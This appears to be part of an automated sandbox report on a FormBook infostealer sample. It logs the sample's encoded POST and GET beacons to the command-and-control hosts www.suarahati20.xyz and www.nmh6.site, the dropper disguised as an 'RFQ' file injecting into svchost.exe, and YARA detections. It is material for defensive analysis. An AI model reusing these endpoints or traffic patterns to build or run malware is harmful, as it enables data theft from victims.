                                                      Data Ascii: N0spilI0=3RKIN8ruKXiYReD8Y1DX3cANHjQwvDsXXwOHKhPdB6TaQkKdpgac2erzDGCSJYTJYNN1lK1cElFSD2xoTOJTlqs3E139u5dp5eloYAXkv3nc4ouKEtR6V+Kar621/FNkMEy0XiTqyNjdG1jdpeK9rolsGK2bg7eYi/KubsaKxy6B8UtKWwmen7MDb0QO7PRTzw==
                                                      Sep 25, 2024 05:38:37.550028086 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                                                      Connection: close
                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                      pragma: no-cache
                                                      content-type: text/html
                                                      content-length: 796
                                                      date: Wed, 25 Sep 2024 03:38:37 GMT
                                                      server: LiteSpeed
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      42 | 192.168.2.4 | 49779 | 198.252.106.191 | 80 | 600 | C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Sep 25, 2024 05:38:39.686003923 CEST | 759 | OUT | POST /4est/ HTTP/1.1
                                                      Host: www.suarahati20.xyz
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 225
                                                      Origin: http://www.suarahati20.xyz
                                                      Referer: http://www.suarahati20.xyz/4est/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 33 52 4b 49 4e 38 72 75 4b 58 69 59 51 2b 54 38 61 57 37 58 31 38 41 4d 62 7a 51 77 6d 6a 73 4c 58 77 43 48 4b 67 62 4e 42 49 6e 61 51 46 36 64 6f 68 61 63 7a 65 72 7a 62 57 43 58 52 34 54 65 59 4e 78 39 6c 4c 6c 63 45 6c 52 53 44 33 74 6f 54 39 68 51 6c 36 73 31 4d 56 33 37 78 4a 64 70 35 65 6c 6f 59 41 44 4f 76 33 76 63 34 59 65 4b 46 4d 52 39 4a 4f 4b 5a 37 71 32 31 37 46 4e 67 4d 45 79 61 58 6d 4c 51 79 4f 62 64 47 77 50 64 6f 50 4c 72 68 6f 6c 71 4a 71 33 36 72 4f 7a 4a 6e 66 2f 35 54 71 53 7a 7a 69 32 6d 30 79 38 51 48 42 48 4a 31 37 6f 77 47 7a 5a 36 32 4d 73 61 6f 35 6b 66 7a 5a 50 36 33 56 77 48 61 74 43 46 51 7a 55 6a 48 77 6b 3d
                                                      Data Ascii: N0spilI0=3RKIN8ruKXiYQ+T8aW7X18AMbzQwmjsLXwCHKgbNBInaQF6dohaczerzbWCXR4TeYNx9lLlcElRSD3toT9hQl6s1MV37xJdp5eloYADOv3vc4YeKFMR9JOKZ7q217FNgMEyaXmLQyObdGwPdoPLrholqJq36rOzJnf/5TqSzzi2m0y8QHBHJ17owGzZ62Msao5kfzZP63VwHatCFQzUjHwk=
                                                      Sep 25, 2024 05:38:40.237739086 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                                                      Connection: close
                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                      pragma: no-cache
                                                      content-type: text/html
                                                      content-length: 796
                                                      date: Wed, 25 Sep 2024 03:38:40 GMT
                                                      server: LiteSpeed
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      43 | 192.168.2.4 | 49780 | 198.252.106.191 | 80 | 600 | C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Sep 25, 2024 05:38:42.233803988 CEST | 10841 | OUT | POST /4est/ HTTP/1.1
                                                      Host: www.suarahati20.xyz
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 10305
                                                      Origin: http://www.suarahati20.xyz
                                                      Referer: http://www.suarahati20.xyz/4est/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 33 52 4b 49 4e 38 72 75 4b 58 69 59 51 2b 54 38 61 57 37 58 31 38 41 4d 62 7a 51 77 6d 6a 73 4c 58 77 43 48 4b 67 62 4e 42 49 66 61 54 33 79 64 70 43 79 63 30 65 72 7a 53 32 43 57 52 34 54 66 59 4e 70 35 6c 4f 38 70 45 6e 70 53 44 56 4a 6f 56 4d 68 51 38 4b 73 31 4f 56 33 2b 75 35 64 38 35 65 31 6b 59 41 54 4f 76 33 76 63 34 61 32 4b 4d 39 52 39 61 65 4b 61 72 36 32 35 2f 46 4e 59 4d 46 61 73 58 6d 66 36 78 2b 37 64 47 55 76 64 76 39 6a 72 70 6f 6c 6f 64 4b 33 59 72 4f 32 52 6e 66 6a 31 54 71 4f 56 7a 67 71 6d 33 57 31 4f 57 43 66 33 6b 36 34 59 54 78 35 45 2f 2b 73 48 6c 59 30 7a 6c 4e 72 32 72 42 35 73 66 4d 6a 51 42 7a 4e 6e 5a 77 6e 6a 62 51 4b 4c 71 7a 57 46 45 70 6b 32 63 68 74 36 47 64 4e 41 44 73 57 4f 6a 58 62 72 70 48 51 53 56 77 53 37 6e 4f 37 47 4b 78 41 55 67 6b 47 4a 36 57 56 32 58 53 64 6d 34 4a 69 75 36 43 77 73 70 73 37 74 55 34 39 52 69 63 61 75 53 37 5a 44 67 46 67 66 4a 34 42 6a 72 68 55 45 4a 43 5a 65 69 2f 72 48 63 6e 4e 4b 42 4b 58 6a 69 7a 78 66 41 [TRUNCATED]
                                                      Data Ascii: N0spilI0= [TRUNCATED]
                                                      Sep 25, 2024 05:38:42.801974058 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                                                      Connection: close
                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                      pragma: no-cache
                                                      content-type: text/html
                                                      content-length: 796
                                                      date: Wed, 25 Sep 2024 03:38:42 GMT
                                                      server: LiteSpeed
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                      Session ID: 44 | Source IP: 192.168.2.4 | Source Port: 49781 | Destination IP: 198.252.106.191 | Destination Port: 80 | PID: 600 | Process: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      Timestamp: Sep 25, 2024 05:38:44.779187918 CEST | Bytes transferred: 473 | Direction: OUT
                                                      GET /4est/?N0spilI0=6TioOITzTznuWaHFY2nP+M5OXgMojRQqdx+6cQbbG9CbTHyFxDml283eSUfpT4rPWLRehJ5KDSFFDUFbTukXgac9EFud27M13v05UDH3lX7bp5CeFPtRd9M=&Vvn=XtJLE6KXyHJ010P HTTP/1.1
                                                      Host: www.suarahati20.xyz
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Timestamp: Sep 25, 2024 05:38:45.354216099 CEST | Bytes transferred: 1033 | Direction: IN
                                                      HTTP/1.1 404 Not Found
                                                      Connection: close
                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                      pragma: no-cache
                                                      content-type: text/html
                                                      content-length: 796
                                                      date: Wed, 25 Sep 2024 03:38:45 GMT
                                                      server: LiteSpeed
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                      Session ID: 45 | Source IP: 192.168.2.4 | Source Port: 49782 | Destination IP: 43.154.104.247 | Destination Port: 80 | PID: 600 | Process: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      Timestamp: Sep 25, 2024 05:38:50.918225050 CEST | Bytes transferred: 721 | Direction: OUT
                                                      POST /8qne/ HTTP/1.1
                                                      Host: www.nmh6.site
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 205
                                                      Origin: http://www.nmh6.site
                                                      Referer: http://www.nmh6.site/8qne/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 48 52 72 72 44 58 52 6e 74 4a 6f 4e 33 31 67 4d 68 34 63 45 76 2b 6b 43 30 4e 69 70 51 48 4b 76 5a 4f 4e 42 6d 43 54 42 57 45 6f 68 6c 35 4f 42 71 58 6d 52 2b 65 50 34 59 42 2f 78 35 35 51 45 71 5a 74 37 4f 54 44 49 41 6f 42 4e 4e 33 78 7a 33 45 73 39 6f 42 72 7a 6e 64 67 4a 65 78 58 7a 46 5a 59 58 78 41 74 37 65 55 4c 36 6d 66 4a 5a 41 35 76 63 53 55 52 4c 53 73 5a 47 41 35 4a 75 70 4d 6b 30 7a 4e 33 75 70 4f 72 71 39 53 4a 58 73 53 43 74 34 68 75 37 33 2f 58 36 45 47 70 47 4f 6d 50 2f 66 48 51 37 71 4f 61 36 70 48 6a 5a 72 36 54 6f 4b 2b 44 36 64 43 6f 51 37 4a 64 50 75 67 3d 3d
                                                      Data Ascii: N0spilI0=HRrrDXRntJoN31gMh4cEv+kC0NipQHKvZONBmCTBWEohl5OBqXmR+eP4YB/x55QEqZt7OTDIAoBNN3xz3Es9oBrzndgJexXzFZYXxAt7eUL6mfJZA5vcSURLSsZGA5JupMk0zN3upOrq9SJXsSCt4hu73/X6EGpGOmP/fHQ7qOa6pHjZr6ToK+D6dCoQ7JdPug==


                                                      Session ID: 46 | Source IP: 192.168.2.4 | Source Port: 49783 | Destination IP: 43.154.104.247 | Destination Port: 80 | PID: 600 | Process: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      Timestamp: Sep 25, 2024 05:38:53.470298052 CEST | Bytes transferred: 741 | Direction: OUT
                                                      POST /8qne/ HTTP/1.1
                                                      Host: www.nmh6.site
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 225
                                                      Origin: http://www.nmh6.site
                                                      Referer: http://www.nmh6.site/8qne/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 48 52 72 72 44 58 52 6e 74 4a 6f 4e 33 56 51 4d 6b 5a 63 45 71 65 6b 4e 78 4e 69 70 43 48 4b 72 5a 4f 42 42 6d 44 6e 72 57 57 63 68 6d 62 6d 42 72 57 6d 52 2f 65 50 34 54 68 2f 30 33 5a 51 66 71 5a 70 7a 4f 54 50 49 41 6f 56 4e 4e 31 70 7a 32 33 30 36 72 78 72 31 76 39 67 50 42 68 58 7a 46 5a 59 58 78 42 49 67 65 56 6a 36 6d 4c 31 5a 53 59 76 66 66 30 52 4d 52 73 5a 47 52 4a 4a 71 70 4d 6b 47 7a 4d 72 58 70 4d 6a 71 39 58 74 58 73 44 43 71 78 68 75 69 71 76 57 61 4e 55 67 57 4b 32 4f 54 59 33 59 62 71 4d 32 4d 68 68 79 44 36 4c 79 2f 59 2b 6e 4a 41 46 68 6b 32 4b 67 47 31 6e 33 75 77 38 6e 32 38 54 58 6c 6e 75 72 39 42 34 54 78 39 36 59 3d
                                                      Data Ascii: N0spilI0=HRrrDXRntJoN3VQMkZcEqekNxNipCHKrZOBBmDnrWWchmbmBrWmR/eP4Th/03ZQfqZpzOTPIAoVNN1pz2306rxr1v9gPBhXzFZYXxBIgeVj6mL1ZSYvff0RMRsZGRJJqpMkGzMrXpMjq9XtXsDCqxhuiqvWaNUgWK2OTY3YbqM2MhhyD6Ly/Y+nJAFhk2KgG1n3uw8n28TXlnur9B4Tx96Y=


                                                      Session ID: 47 | Source IP: 192.168.2.4 | Source Port: 49784 | Destination IP: 43.154.104.247 | Destination Port: 80 | PID: 600 | Process: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      Timestamp: Sep 25, 2024 05:38:56.020057917 CEST | Bytes transferred: 10823 | Direction: OUT
                                                      POST /8qne/ HTTP/1.1
                                                      Host: www.nmh6.site
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 10305
                                                      Origin: http://www.nmh6.site
                                                      Referer: http://www.nmh6.site/8qne/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 48 52 72 72 44 58 52 6e 74 4a 6f 4e 33 56 51 4d 6b 5a 63 45 71 65 6b 4e 78 4e 69 70 43 48 4b 72 5a 4f 42 42 6d 44 6e 72 57 57 6b 68 6d 71 47 42 72 78 61 52 34 65 50 34 51 68 2f 31 33 5a 51 65 71 5a 52 33 4f 54 7a 79 41 72 74 4e 4d 57 68 7a 78 47 30 36 77 68 72 31 6a 64 67 4b 65 78 58 71 46 5a 49 54 78 42 59 67 65 56 6a 36 6d 4e 52 5a 45 35 76 66 4d 45 52 4c 53 73 5a 53 41 35 49 39 70 4d 39 7a 7a 4d 66 48 70 64 44 71 2b 33 64 58 6a 52 71 71 74 78 75 33 70 76 57 34 4e 55 39 4d 4b 32 43 70 59 32 63 39 71 4e 4f 4d 6b 6e 6a 6b 74 72 6d 70 4b 63 76 70 58 47 39 48 2f 36 34 44 37 58 43 54 34 35 79 70 68 43 58 56 71 74 36 51 45 4a 66 35 70 73 58 6b 6a 7a 59 43 56 77 2b 4a 4b 30 50 33 2f 48 57 76 64 51 5a 48 50 6b 45 58 6f 57 67 4b 62 74 5a 39 62 67 4e 51 44 75 78 48 62 4e 73 38 43 62 4b 32 30 62 37 34 64 66 46 33 54 78 73 37 58 54 50 58 43 62 42 39 34 42 78 38 76 62 36 30 65 58 33 47 74 4d 4f 4a 62 46 31 75 35 43 47 4a 52 45 76 52 77 66 33 43 32 4a 6d 61 55 72 71 38 68 43 6e 6c 67 [TRUNCATED]
                                                      Data Ascii: N0spilI0=HRrrDXRntJoN3VQMkZcEqekNxNipCHKrZOBBmDnrWWkhmqGBrxaR4eP4Qh/13ZQeqZR3OTzyArtNMWhzxG06whr1jdgKexXqFZITxBYgeVj6mNRZE5vfMERLSsZSA5I9pM9zzMfHpdDq+3dXjRqqtxu3pvW4NU9MK2CpY2c9qNOMknjktrmpKcvpXG9H/64D7XCT45yphCXVqt6QEJf5psXkjzYCVw+JK0P3/HWvdQZHPkEXoWgKbtZ9bgNQDuxHbNs8CbK20b74dfF3Txs7XTPXCbB94Bx8vb60eX3GtMOJbF1u5CGJREvRwf3C2JmaUrq8hCnlgW4USMz9QTaXZpfqiw3JMqDowfC42KfClvEzGtwe/U8oyGsLRA53HALJDm2ZdIz6vuF7IYQ7a+ZN3IlBzJAccp6GMjwa9l9pDdOmdEtJdvxq5K2fbtcRXBKcUWV9BBwX3m8yWZQHPxYhi5AbOf5rjFNGpIwm+KmzhEu9bxCzA+UVK2KIwW3uOZsHpZ0X93pledmgJly8NWbfRYnuwisW1wCEd35cymVr72LQb7tskzvQglXNCQvUTpxYmUyoN5CGW8bDzFYs/4HebEfeVcOZr2MLugNCXO/Nrt29/68RltYAsctaxDWupVy2OvBPCPJjNZitxGsD+VZYyWdSw7oo0osui+uEBl7mXY1mXzaYHkpV4WfTltBVQfBbPFBs2qU8BJHwHa/3cgTNdUDz2bIU4HEq8Fwg2W/5sZtKXM7bd7dPOt4OzZMN55rcdEGko+ro62hH+l9muN991muAnTuR0QESHhMT3qg9J6bzoljKczAqK+Q3/il2V9V2KVeUIgDB7n/TJDSUzN+g21s8y8Pt+z0x+zNeCGOkbQe5FIiXheCm8PrjcGDDq30HKDcs5A90LDOBgUOclJpKNY6Z7D7Ufj8N2XL0KAzlVGyUrUkzVh5Gv2by1wUe3UdpFipHCEZAHyrTe/Itb/Q39vnEP4gBYog4UVWGIMFQX9N [TRUNCATED]


                                                      Session ID: 48 | Source IP: 192.168.2.4 | Source Port: 49785 | Destination IP: 43.154.104.247 | Destination Port: 80 | PID: 600 | Process: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      Timestamp: Sep 25, 2024 05:38:58.557384014 CEST | Bytes transferred: 467 | Direction: OUT
                                                      GET /8qne/?N0spilI0=KTDLAip6979182Yus4gak8cu0ouPK1SjRu9dlBr1KRF7u6Oe/Vup1PLCUBiG85sopIJcMB3IBfxfJF1E2Fdc2yH6m+FOGHStPZpUzCEofUPNgN9qGZfSYG8=&Vvn=XtJLE6KXyHJ010P HTTP/1.1
                                                      Host: www.nmh6.site
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36


                                                      Target ID:0
                                                      Start time:23:34:59
                                                      Start date:24/09/2024
                                                      Path:C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe"
                                                      Imagebase:0x400000
                                                      File size:1'360'461 bytes
                                                      MD5 hash:8CD57235A1BA838DF14C6A67AD2048D0
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:1
                                                      Start time:23:35:02
                                                      Start date:24/09/2024
                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe"
                                                      Imagebase:0x1a0000
                                                      File size:46'504 bytes
                                                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2168727858.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2168727858.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2169121042.00000000037B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2169121042.00000000037B0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2169602944.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
